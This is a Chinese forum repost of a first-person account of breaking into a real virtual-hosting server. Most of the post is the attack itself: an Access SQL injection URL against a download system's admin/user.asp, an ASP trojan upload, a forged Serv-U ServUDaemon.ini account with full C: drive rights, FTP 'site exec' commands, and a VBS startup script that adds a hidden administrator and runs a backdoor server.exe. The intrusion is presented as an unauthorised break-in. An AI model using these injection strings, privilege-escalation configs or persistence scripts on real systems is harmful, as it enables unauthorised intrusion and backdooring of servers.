• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    黑客对一台虚拟主机服务器的渗透

    发布者: 雪落无声 | 发布时间: 2025-6-27 15:38| 查看数: 98| 评论数: 0|帖子模式

    前几天听一树说了惊云下载系统的漏洞
    问题文件出在admin/user.asp
    提交
    http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
    就相当于:
    select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用access注入得到管理员密码
    上面有一个文件upfile.htm
    手工利用了下动网的upfile.asp漏洞
    就成功上传了个asp木马
    然后那个虚拟主机的c,d盘是NTFS分区
    不能访问E盘装着servu,php,webmail,
    F盘是虚拟站点
    servu安装目录可写~
    本来打算替换他servu文件的~但是觉的太麻烦
    还容易让管理员怀疑
    想起servu的本地提升来了 在自己计算机上装了个servu
    添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
    然后去servu安装目录里看ServUDaemon.ini
    格式是这样的
    [GLOBAL]
    Version=5.0.0.11
    LocalSetupPassword=072C63105200180D5C07170A7E3E
    LocalSetupPortNo=60628
    ProcessID=972
    [DOMAINS]
    Domain1=192.168.0.102||21|向导产生域|1|0|0
    Domain2=192.168.0.102||2121|123|2|0|0
    [Domain1]
    User1=www|1|0
    [USER=www|1]
    Password=ih0C292E1AC82920B7F384007F302A1296
    HomeDir=D:\xiaoben
    TimeOut=600
    Note1="Wizard generated account"
    Access1=D:\xiaoben|RLPWAMCD
    SKEYValues=
    [Domain2]
    User1=rover|1|0
    User2=123|1|0
    [USER=rover|2]
    Password=dx5D12C060F16C7166779414FA038E881D
    HomeDir=c:\
    TimeOut=600
    Maintenance=System
    Access1=C:\|RWAMELCDP
    SKEYValues=
    [USER=123|2]
    Password=kv3F6EED70340AD1478ADF95963A07FD00
    HomeDir=c:\
    TimeOut=600
    Access1=C:\|RWAMLCDP
    SKEYValues=
    ----------------
    其中rover用户就是我添加的那个
    在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
    访照我本地的INI写进一个用户进去
    User1=rover|1|0
    [USER=rover|2]
    Password=dx5D12C060F16C7166779414FA038E881D
    HomeDir=c:\
    TimeOut=600
    Maintenance=System
    Access1=C:\|RWAMELCDP
    SKEYValues=
    保存~ 用我新建的用户和密码连接~
    好的,还是连上了
    ftp
    ftp>open ip  
    Connected to ip.
    220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
    User (ipnone)): id //输入构造的用户
    331 User name okay, please send complete E-mail address as password.
    Password:password //密码
    230 User logged in, proceed.
    ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
    250 Directory changed to /WINNT
    ftp>cd system32 //进入system32目录
    250 Directory changed to /WINNT/system32
    ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。
    提示没有权限~郁闷~
    但是我们有对C盘的访问权限了是不~hoho~
    把后门(server.exe)传他system32目录
    然后写一个VBs教本
    set wshshell=createobject ("wscript.shell")  
    a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)  
    b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)
    b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)
    b=wshshell.run ("cmd.exe /c server.exe",0) 存为HELP.vbe
    这个教本的作用是修改tsinternetuser用户密码为rover1234
    并且提升为管理员
    然后执行system32目录下的server.exe
    把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
    目录
    这样管理员只要一登陆就会执行那个教本~
    接下来就是等了~
    等他登陆~
    等了一段时间(看了一部蜘蛛侠的时间吧)~
    连接后门~得到admin权限的shell
    hoho~
    接下来是善后工作了~就不说了
    今天心情非常糟~有一些事情压的我喘不过气来
    考试的时候当老师面把卷子撕了,然后扬步走了~
    妈妈的~过程写的很乱~见谅

    来源:https://www.jb51.net/hack/5378.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表